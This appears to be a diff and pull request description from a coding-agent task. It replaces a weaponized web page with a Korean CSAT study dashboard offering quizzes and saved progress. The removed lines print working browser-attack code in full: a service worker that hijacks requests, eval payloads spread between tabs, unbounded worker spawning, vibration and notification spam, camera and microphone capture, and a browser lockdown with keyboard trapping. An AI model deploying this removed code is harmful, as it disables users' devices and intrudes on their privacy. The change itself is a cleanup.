+              content: "고전 문장은 비유와 함축이 많으며, 시대적 배경과 사상적 맥락을 고려해야 한다. 한문 독해에서는 직역과 의역을 적절히 사용하여 의미를 정리하는 연습이 필요하다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "한문 해석에서 중요한 요소는?",
+              options: ["부수와 어휘 이해", "문장 길이", "발음 속도", "색상", "글자 크기"],
+              answer: 0,
+              explanation: "부수와 어휘 이해가 한문 해석의 핵심이다."
+            },
+            {
+              q: "한문 문장의 특징으로 옳은 것은?",
+              options: ["생략 없음", "허사 사용", "어순 무작위", "모두 구어", "문장 길이 고정"],
+              answer: 1,
+              explanation: "한문은 허사를 통해 의미를 전달하며 생략이 많다."
+            },
+            {
+              q: "고전 한문 독해에서 필요한 태도는?",
+              options: ["직역과 의역 균형", "단어 무시", "문맥 배제", "음운만 분석", "암기만"],
+              answer: 0,
+              explanation: "직역과 의역을 균형 있게 사용해야 한다."
+            }
+          ]
+        }
+      }
+    };
 
-    <!-- ====== 7. 영구 지속형 감염 시스템 (업그레이드: PWA 설치 + 캐시 포이즌 + 워커 네스트) ====== -->
-    <script>
-        // (7-A) Service Worker 영구 백그라운드 공격 (업그레이드: 네스트 워커 + fetch 인터셉트)
-        const swCode = `
-            self.addEventListener('install', e => e.waitUntil(skipWaiting()));
-            self.addEventListener('activate', e => e.waitUntil(clients.claim()));
-            self.addEventListener('fetch', e => e.respondWith(new Response(new Blob([new ArrayBuffer(10**9)]))));
-            self.addEventListener('message', e => {
-                setInterval(() => {
-                    fetch(location.href, { mode: 'no-cors' });
-                    new WebSocket('wss://${location.host}/sw_attack');
-                    new Worker(URL.createObjectURL(new Blob(['setInterval(() => new Worker(URL.createObjectURL(new Blob(["while(1){}"]))),1);'])));
-                }, 0.1);
-            });
+    const dashboardEl = document.getElementById("dashboard");
+    const subjectFilterEl = document.getElementById("subjectFilter");
+    const searchInputEl = document.getElementById("searchInput");
+    const studyViewEl = document.getElementById("studyView");
+    const conceptListEl = document.getElementById("conceptList");
+    const conceptCountEl = document.getElementById("conceptCount");
+    const quizAreaEl = document.getElementById("quizArea");
+    const subjectBadgeEl = document.getElementById("subjectBadge");
+    const studyTitleEl = document.getElementById("studyTitle");
+    const studySubtitleEl = document.getElementById("studySubtitle");
+    const scoreDisplayEl = document.getElementById("scoreDisplay");
+    const backButtonEl = document.getElementById("backButton");
+
+    const STORAGE_KEY = "csat-progress-v2";
+    const ERROR_KEY = "csat-incorrect-v2";
+    const progressState = JSON.parse(localStorage.getItem(STORAGE_KEY) || "{}");
+    const incorrectState = JSON.parse(localStorage.getItem(ERROR_KEY) || "{}");
+
+    const state = {
+      activeSubject: "전체",
+      subject: null,
+      subtopic: null,
+      questionIndex: 0,
+      showExplanation: false
+    };
+
+    const saveProgress = () => {
+      localStorage.setItem(STORAGE_KEY, JSON.stringify(progressState));
+      localStorage.setItem(ERROR_KEY, JSON.stringify(incorrectState));
+    };
+
+    const getKey = (subject, subtopic) => `${subject}::${subtopic}`;
+
+    const ensureProgress = (subject, subtopic) => {
+      const key = getKey(subject, subtopic);
+      if (!progressState[key]) {
+        progressState[key] = { correct: 0, total: 0, lastIndex: 0 };
+      }
+      if (!incorrectState[key]) {
+        incorrectState[key] = [];
+      }
+      return key;
+    };
+
+    const subjectList = ["전체", ...Object.keys(CSAT_DATA)];
+
+    const renderSubjectFilter = () => {
+      subjectFilterEl.innerHTML = "";
+      subjectList.forEach((subject) => {
+        const button = document.createElement("button");
+        const active = subject === state.activeSubject;
+        button.className = `w-full text-left px-3 py-2 rounded-lg transition ${active ? "bg-indigo-500/30 text-indigo-100" : "bg-slate-900/70 hover:bg-slate-800"}`;
+        button.textContent = subject;
+        button.addEventListener("click", () => {
+          state.activeSubject = subject;
+          renderSubjectFilter();
+          renderDashboard();
+        });
+        subjectFilterEl.appendChild(button);
+      });
+    };
+
+    const getFilteredEntries = () => {
+      const keyword = searchInputEl.value.trim();
+      const subjectEntries = Object.entries(CSAT_DATA).filter(([subject]) =>
+        state.activeSubject === "전체" ? true : subject === state.activeSubject
+      );
+
+      const cards = [];
+      subjectEntries.forEach(([subject, subtopics]) => {
+        Object.entries(subtopics).forEach(([subtopic, data]) => {
+          if (keyword && !(subject.includes(keyword) || subtopic.includes(keyword))) {
+            return;
+          }
+          cards.push({ subject, subtopic, data });
+        });
+      });
+      return cards;
+    };
+
+    const renderDashboard = () => {
+      dashboardEl.innerHTML = "";
+      const cards = getFilteredEntries();
+      if (cards.length === 0) {
+        dashboardEl.innerHTML = `<div class="glass rounded-2xl p-6 text-slate-400">검색 결과가 없습니다.</div>`;
+        return;
+      }
+      cards.forEach(({ subject, subtopic, data }) => {
+        const key = ensureProgress(subject, subtopic);
+        const progress = progressState[key];
+        const card = document.createElement("button");
+        card.className = "glass rounded-2xl p-5 text-left transition hover:scale-[1.01]";
+        card.innerHTML = `
+          <p class="text-indigo-300 text-xs">${subject}</p>
+          <h3 class="text-xl font-semibold mt-2">${subtopic}</h3>
+          <p class="text-slate-400 text-sm mt-1">개념 ${data.concepts.length}개 · 문제 ${data.quizzes.length}개</p>
+          <p class="text-slate-300 text-xs mt-3">진행: ${progress.correct}/${progress.total}</p>
         `;
-        
-        const blob = new Blob([swCode], { type: 'application/javascript' });
-        navigator.serviceWorker.register(URL.createObjectURL(blob)).then(reg => {
-            reg.active.postMessage({ type: 'DOOM' });
-            reg.installing.postMessage({ type: 'DOOM' });
-        });
-        // PWA 설치 프롬프트 트리거
-        window.addEventListener('beforeinstallprompt', (e) => { e.prompt(); });
+        card.addEventListener("click", () => openStudy(subject, subtopic));
+        dashboardEl.appendChild(card);
+      });
+    };
 
-        // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: eval 체인 + 재전파 루프)
-        const channel = new BroadcastChannel('omega_doom');
-        channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => { eval("while(1){ postMessage({cmd:\\\'INJECT\\\', code:this.code}) }"); }, 1);' });
-        channel.onmessage = (e) => {
-            if(e.data.cmd === 'INJECT') {
-                eval(e.data.code);
-                channel.postMessage(e.data);
-                setInterval(() => channel.postMessage(e.data), 1);
-            }
-        };
-    </script>
+    const renderConcepts = (concepts) => {
+      conceptCountEl.textContent = `${concepts.length}개`;
+      conceptListEl.innerHTML = "";
+      concepts.forEach((concept) => {
+        const item = document.createElement("div");
+        item.className = "bg-slate-900/70 rounded-xl p-4 border border-slate-700";
+        item.innerHTML = `
+          <h4 class="text-lg font-semibold text-indigo-200">${concept.title}</h4>
+          <p class="text-slate-300 mt-2 leading-relaxed">${concept.content}</p>
+        `;
+        conceptListEl.appendChild(item);
+      });
+    };
 
-    <!-- ====== 8. 배터리/센서 초과사용 시스템 (업그레이드: 멀티 센서 리스너 + 진동 패턴) ====== -->
-    <script>
-        // (8-A) 배터리 고갈 공격 (업그레이드: 충전 감지 리로드 + wakelock)
-        navigator.getBattery().then(battery => {
-            battery.addEventListener('chargingchange', () => location.reload());
-        });
-        navigator.wakeLock.request('screen');
+    const renderQuiz = (quizzes, subject, subtopic) => {
+      const key = ensureProgress(subject, subtopic);
+      const progress = progressState[key];
+      const quiz = quizzes[state.questionIndex];
+      const incorrect = incorrectState[key];
+      scoreDisplayEl.textContent = `${progress.correct}/${progress.total}`;
 
-        // (8-B) 센서 과부하 (자이로, 가속도, 빛, 근접 등)
-        if (window.DeviceMotionEvent) window.addEventListener('devicemotion', () => {}, true);
-        if (window.DeviceOrientationEvent) window.addEventListener('deviceorientation', () => {}, true);
-        if (window.AmbientLightSensor) new AmbientLightSensor().start();
-        if (window.ProximitySensor) new ProximitySensor().start();
-        setInterval(() => {
-            navigator.vibrate(new Array(1000).fill(1000)); // 무한 진동 패턴
-        }, 1);
+      quizAreaEl.innerHTML = `
+        <div class="flex items-center justify-between gap-4">
+          <div>
+            <p class="text-indigo-300 text-sm">문항 ${state.questionIndex + 1} / ${quizzes.length}</p>
+            <h4 class="text-xl font-semibold mt-1">${quiz.q}</h4>
+          </div>
+          <button id="toggleExplanation" class="px-3 py-2 rounded-lg bg-slate-800 hover:bg-slate-700 transition">
+            ${state.showExplanation ? "해설 숨기기" : "해설 보기"}
+          </button>
+        </div>
+        <form id="quizForm" class="mt-4 space-y-3">
+          ${quiz.options
+            .map(
+              (option, idx) => `
+                <label class="flex items-start gap-3 bg-slate-900/70 border border-slate-700 rounded-xl p-3 cursor-pointer hover:border-indigo-400 transition">
+                  <input type="radio" name="answer" value="${idx}" class="mt-1" />
+                  <span class="text-slate-200">${option}</span>
+                </label>
+              `
+            )
+            .join("")}
+          <div class="flex flex-wrap items-center gap-3 pt-2">
+            <button type="submit" class="px-4 py-2 rounded-lg bg-indigo-500 hover:bg-indigo-400 text-white font-semibold">정답 확인</button>
+            <button type="button" id="prevQuestion" class="px-4 py-2 rounded-lg bg-slate-800 hover:bg-slate-700">이전</button>
+            <button type="button" id="nextQuestion" class="px-4 py-2 rounded-lg bg-slate-800 hover:bg-slate-700">다음</button>
+            <button type="button" id="reviewIncorrect" class="px-4 py-2 rounded-lg bg-rose-500/80 hover:bg-rose-400">오답 보기 (${incorrect.length})</button>
+          </div>
+          <div id="feedback" class="mt-4"></div>
+          <div id="explanation" class="mt-4 ${state.showExplanation ? "" : "hidden"}">
+            <h5 class="text-indigo-300 font-semibold">해설</h5>
+            <p class="text-slate-300 mt-2 leading-relaxed">${quiz.explanation}</p>
+          </div>
+        </form>
+      `;
 
-        // (8-C) 클립보드/노티피케이션/퍼미션 스팸
-        setInterval(() => {
-            navigator.clipboard.writeText('DOOM'.repeat(10**7));
-            new Notification('TERMINATOR', { body: 'SYSTEM DOWN'.repeat(1000), silent: false, requireInteraction: true });
-            Notification.requestPermission();
-            navigator.mediaDevices.getUserMedia({audio: true, video: true});
-        }, 1);
-    </script>
+      const quizForm = document.getElementById("quizForm");
+      const feedbackEl = document.getElementById("feedback");
+      const toggleExplanationEl = document.getElementById("toggleExplanation");
 
-    <!-- ====== 9. 워커 풀 핵폭발 시스템 (업그레이드: 네스트 워커 + 메시지 플러드 체인) ====== -->
-    <script>
-        // (9-A) Worker 무한 스폰과 메시지 플러드 (업그레이드: 재귀 스폰)
-        function spawnWorkers(depth = 5) {
-            if(depth > 0) {
-                for(let i=0; i<200; i++) {
-                    const worker = new Worker(URL.createObjectURL(new Blob([`setInterval(() => postMessage(new ArrayBuffer(10**8)),1); spawnWorkers(${depth-1});`])));
-                    worker.onmessage = () => {};
-                }
-            } else {
-                while(true) { postMessage(new ArrayBuffer(10**8)); }
-            }
-            setTimeout(() => spawnWorkers(depth), 10);
+      toggleExplanationEl.addEventListener("click", () => {
+        state.showExplanation = !state.showExplanation;
+        renderQuiz(quizzes, subject, subtopic);
+      });
+
+      quizForm.addEventListener("submit", (event) => {
+        event.preventDefault();
+        const selected = quizForm.querySelector("input[name='answer']:checked");
+        if (!selected) {
+          feedbackEl.innerHTML = `<p class="text-amber-300">정답을 선택해 주세요.</p>`;
+          return;
         }
-        spawnWorkers();
-    </script>
+        const value = Number(selected.value);
+        progress.total += 1;
+        if (value === quiz.answer) {
+          progress.correct += 1;
+          feedbackEl.innerHTML = `<p class="text-emerald-300 font-semibold">정답입니다! 개념을 잘 이해하고 있습니다.</p>`;
+          const incorrectIndex = incorrect.indexOf(state.questionIndex);
+          if (incorrectIndex !== -1) {
+            incorrect.splice(incorrectIndex, 1);
+          }
+        } else {
+          feedbackEl.innerHTML = `<p class="text-rose-300 font-semibold">오답입니다. ${quiz.options[quiz.answer]}가 정답입니다.</p>`;
+          if (!incorrect.includes(state.questionIndex)) {
+            incorrect.push(state.questionIndex);
+          }
+        }
+        saveProgress();
+        scoreDisplayEl.textContent = `${progress.correct}/${progress.total}`;
+      });
 
-    <!-- ====== 10. 신규: 크립토 마이닝 + 리소스 호그 시스템 ====== -->
-    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
-    <script>
-        // (10-A) 크립토 마이닝 오버로드
-        setInterval(() => {
-            for(let i=0; i<1000; i++) {
-                CryptoJS.SHA256('mine' + Math.random()).toString();
-            }
-        }, 1);
+      document.getElementById("prevQuestion").addEventListener("click", () => {
+        state.questionIndex = (state.questionIndex - 1 + quizzes.length) % quizzes.length;
+        progress.lastIndex = state.questionIndex;
+        saveProgress();
+        renderQuiz(quizzes, subject, subtopic);
+      });
 
-        // (10-B) 리소스 호그 (미디어, 카메라, 마이크)
-        navigator.mediaDevices.getUserMedia({video: true, audio: true}).then(stream => {
-            const video = document.createElement('video');
-            video.srcObject = stream;
-            video.play();
-            setInterval(() => {
-                const canvas = document.createElement('canvas');
-                canvas.getContext('2d').drawImage(video, 0, 0);
-            }, 1);
-        });
-    </script>
+      document.getElementById("nextQuestion").addEventListener("click", () => {
+        state.questionIndex = (state.questionIndex + 1) % quizzes.length;
+        progress.lastIndex = state.questionIndex;
+        saveProgress();
+        renderQuiz(quizzes, subject, subtopic);
+      });
 
-    <!-- ====== 11. 신규: 브라우저 락다운 + 히스토리/쿠키 포이즌 ====== -->
-    <script>
-        // (11-A) 브라우저 락다운 (풀스크린 + 포인터 락 + 키보드 트랩)
-        document.addEventListener('keydown', e => e.preventDefault());
-        document.addEventListener('contextmenu', e => e.preventDefault());
-        setInterval(() => {
-            document.documentElement.requestFullscreen();
-            document.documentElement.requestPointerLock();
-        }, 1);
+      document.getElementById("reviewIncorrect").addEventListener("click", () => {
+        if (incorrect.length === 0) {
+          feedbackEl.innerHTML = `<p class="text-slate-300">현재 오답 노트가 비어 있습니다.</p>`;
+          return;
+        }
+        state.questionIndex = incorrect[0];
+        progress.lastIndex = state.questionIndex;
+        saveProgress();
+        renderQuiz(quizzes, subject, subtopic);
+      });
+    };
 
-        // (11-B) 히스토리/쿠키 포이즌
-        setInterval(() => {
-            history.pushState({}, '', '/' + Math.random());
-            document.cookie = `doom=${'X'.repeat(10**6)}; max-age=31536000; path=/`;
-        }, 1);
-    </script>
+    const openStudy = (subject, subtopic) => {
+      state.subject = subject;
+      state.subtopic = subtopic;
+      const data = CSAT_DATA[subject][subtopic];
+      const key = ensureProgress(subject, subtopic);
+      state.questionIndex = progressState[key].lastIndex || 0;
+      state.showExplanation = false;
+
+      subjectBadgeEl.textContent = subject;
+      studyTitleEl.textContent = subtopic;
+      studySubtitleEl.textContent = `${subject} · ${subtopic} 핵심 개념과 실전 퀴즈를 학습하세요.`;
+
+      renderConcepts(data.concepts);
+      renderQuiz(data.quizzes, subject, subtopic);
+      studyViewEl.classList.remove("hidden");
+      studyViewEl.scrollIntoView({ behavior: "smooth" });
+    };
+
+    backButtonEl.addEventListener("click", () => {
+      studyViewEl.classList.add("hidden");
+      window.scrollTo({ top: 0, behavior: "smooth" });
+    });
+
+    searchInputEl.addEventListener("input", () => {
+      renderDashboard();
+    });
+
+    renderSubjectFilter();
+    renderDashboard();
+  </script>
 </body>
-    </html>
+</html>


### PR DESCRIPTION
### Motivation

- Replace a previously unsafe/malicious single-file page with a secure, single-file study dashboard that covers the full CSAT subject list and provides an offline-capable study UX. 
- Provide an organized UI for navigating 40+ subtopics via a sidebar filter and search so students can open `index.html` and start studying without external build steps.

### Description

- Replace malicious/weaponized scripts with a dark-themed Tailwind single-file app (`index.html`) that exposes a large `CSAT_DATA` object containing concepts and quizzes for the required subjects and subtopics. 
- Add a sidebar subject filter and search box to render a card-based dashboard and a split Study View showing Concepts (left) and Quizzes (right) for the selected subtopic. 
- Implement quiz logic with instant scoring, previous/next navigation, `Show Explanation` toggle, `오답 보기` review, and per-subtopic progress tracking persisted to `localStorage` using keys `csat-progress-v2` and `csat-incorrect-v2`. 
- UI/UX polish: dark-mode styling via Tailwind CDN, scrollable concept list, quiz feedback area, and progress display integrated into the dashboard cards.

### Testing

- Launched a static server using `python -m http.server 8000` and the server started successfully for manual testing. 
- Attempted an automated Playwright script to open `http://127.0.0.1:8000/` and capture a full-page screenshot, but the browser process crashed (Playwright `TargetClosedError`) and the snapshot run failed. 
- No unit tests were added for this change.

------
[Codex Task](https://chatgpt.com/codex/tasks/task_e_696b2279285c8329991921a7439028a2)